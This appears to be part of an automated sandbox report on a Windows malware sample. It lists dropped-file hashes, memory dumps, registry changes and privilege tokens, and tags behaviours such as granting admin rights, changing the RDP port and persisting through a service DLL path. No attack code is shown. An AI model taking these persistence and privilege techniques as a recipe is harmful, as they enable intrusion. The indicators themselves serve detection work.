memory/908-84-0x0000000002422000-0x0000000002424000-memory.dmp

memory/908-85-0x0000000002424000-0x0000000002427000-memory.dmp

memory/908-86-0x0000000002427000-0x0000000002428000-memory.dmp

memory/908-83-0x000000001B8F0000-0x000000001BBEF000-memory.dmp

memory/676-87-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 e2967258866267f5cd57ee6467242892
SHA1 9883cb588b447a714b0959191dca85b6a1584b5c
SHA256 fe0608643e423e1b9e375b8910848e999c48aaae2ec44e90f07f8e06f09be74a
SHA512 019630a91cf729ff337cbaec81680a9905bd32ef624981c647e5b2dc7ee04aa91bf64aca027a679e9e2af75ecd44671b7503e785bc0feae9895b9cfef2b0f991

memory/676-90-0x000007FEEB1C0000-0x000007FEEBD1D000-memory.dmp

memory/908-91-0x000000000242C000-0x000000000244B000-memory.dmp

memory/676-93-0x00000000024F0000-0x00000000024F2000-memory.dmp

memory/676-92-0x000000001B7B0000-0x000000001BAAF000-memory.dmp

memory/676-94-0x00000000024F2000-0x00000000024F4000-memory.dmp

memory/676-95-0x00000000024FC000-0x000000000251B000-memory.dmp

memory/1780-98-0x0000000000000000-mapping.dmp

memory/676-97-0x00000000024F7000-0x00000000024F8000-memory.dmp

memory/676-96-0x00000000024F4000-0x00000000024F7000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 e2967258866267f5cd57ee6467242892
SHA1 9883cb588b447a714b0959191dca85b6a1584b5c
SHA256 fe0608643e423e1b9e375b8910848e999c48aaae2ec44e90f07f8e06f09be74a
SHA512 019630a91cf729ff337cbaec81680a9905bd32ef624981c647e5b2dc7ee04aa91bf64aca027a679e9e2af75ecd44671b7503e785bc0feae9895b9cfef2b0f991

memory/1780-101-0x000007FEEB1C0000-0x000007FEEBD1D000-memory.dmp

memory/1780-102-0x00000000029F0000-0x00000000029F2000-memory.dmp

memory/1780-103-0x00000000029F2000-0x00000000029F4000-memory.dmp

memory/1780-104-0x00000000029F4000-0x00000000029F7000-memory.dmp

memory/1780-105-0x000000001B870000-0x000000001BB6F000-memory.dmp

memory/1780-107-0x00000000029FC000-0x0000000002A1B000-memory.dmp

memory/1780-106-0x00000000029F7000-0x00000000029F8000-memory.dmp

memory/984-108-0x0000000000000000-mapping.dmp

C:\Windows\system32\rfxvmt.dll

MD5 dc39d23e4c0e681fad7a3e1342a2843c
SHA1 58fd7d50c2dca464a128f5e0435d6f0515e62073
SHA256 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA512 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

memory/1612-110-0x0000000000000000-mapping.dmp

memory/1820-111-0x0000000000000000-mapping.dmp

memory/968-112-0x0000000000000000-mapping.dmp

memory/1880-113-0x0000000000000000-mapping.dmp

memory/1812-114-0x0000000000000000-mapping.dmp

memory/1800-115-0x0000000000000000-mapping.dmp

memory/1420-116-0x0000000000000000-mapping.dmp

memory/1292-117-0x0000000000000000-mapping.dmp

memory/1660-118-0x0000000000000000-mapping.dmp

memory/1004-119-0x0000000000000000-mapping.dmp

memory/2008-120-0x0000000000000000-mapping.dmp

memory/1480-121-0x0000000000000000-mapping.dmp

memory/1444-122-0x0000000000000000-mapping.dmp

memory/1576-123-0x0000000000000000-mapping.dmp

memory/1764-124-0x0000000000000000-mapping.dmp

memory/1744-125-0x0000000000000000-mapping.dmp

memory/1164-126-0x0000000000000000-mapping.dmp

memory/1736-127-0x0000000000000000-mapping.dmp

memory/1712-128-0x0000000000000000-mapping.dmp

memory/1332-129-0x0000000000000000-mapping.dmp

\Windows\Branding\mediasrv.png

MD5 2997902dba8aefe9e872b14c2bfb584b
SHA1 cca608ebdde64a12dca56b2bd4864089857eba01
SHA256 537ab9c5f678410f21c063f11f4a894cc15025a5590199716a01bbf365dc0e50
SHA512 4fc959cbf5bebfcb5a32fdebd2ceec8943f9d3d0ffcaed236b2d73b680c5c5f6c85d5ad3d192d7d565f4b2fe07fb87321a8036a304147df2b7f45936ff5f9fc1

\Windows\Branding\mediasvc.png

MD5 9119f61ba0d487585a8fd5aaa4198a9a
SHA1 1ff2e337e5d1547d9e1824062500f743aae999db
SHA256 6a3da788a78fc2024fbfb135624047a7d15edcae3798a3cb0e87fbab740d70f1
SHA512 322e3e0006a3015c0495b76bdf9125285e6a6dd2f84d69996e4d95cbc73449269b7945ccccad465d417394075bc69f46f91ad1eb95f717958977cb88139267ab

memory/580-132-0x0000000000000000-mapping.dmp

memory/1844-133-0x0000000000000000-mapping.dmp

memory/700-134-0x0000000000000000-mapping.dmp

memory/1632-135-0x0000000000000000-mapping.dmp

memory/1156-136-0x0000000000000000-mapping.dmp

memory/404-137-0x0000000000000000-mapping.dmp

memory/1660-138-0x0000000000000000-mapping.dmp

memory/1304-139-0x0000000000000000-mapping.dmp

memory/1752-140-0x0000000000000000-mapping.dmp

memory/1664-141-0x0000000000000000-mapping.dmp

memory/988-142-0x0000000000000000-mapping.dmp

memory/1352-143-0x0000000000000000-mapping.dmp

memory/1820-144-0x0000000000000000-mapping.dmp

memory/1800-145-0x0000000000000000-mapping.dmp

memory/1320-146-0x0000000000000000-mapping.dmp

memory/1792-147-0x0000000000000000-mapping.dmp

memory/1792-149-0x000007FEEB1C0000-0x000007FEEBD1D000-memory.dmp

memory/1792-150-0x00000000013A0000-0x00000000013A2000-memory.dmp

memory/1792-151-0x00000000013A2000-0x00000000013A4000-memory.dmp

memory/1792-152-0x00000000013A4000-0x00000000013A7000-memory.dmp

memory/1792-153-0x00000000013AB000-0x00000000013CA000-memory.dmp

memory/1352-154-0x0000000000000000-mapping.dmp

memory/1756-155-0x0000000000000000-mapping.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2021-09-24 21:43

Reported

2021-09-24 21:45

Platform

win10v20210408

Max time kernel

150s

Max time network

99s

Command Line

"C:\Users\Admin\AppData\Local\Temp\83d119a963e7050995f9bf6be8841b95.exe"

Signatures

Grants admin privileges

Modifies RDP port number used by Windows

Sets DLL path for service in the registry

persistence

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_zx3sgsyg.0ou.psm1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF7DA.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF7EB.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_1cm2mslq.hrb.ps1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF77A.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF7C9.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF7FB.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\Wbem\WMIC.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones," C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
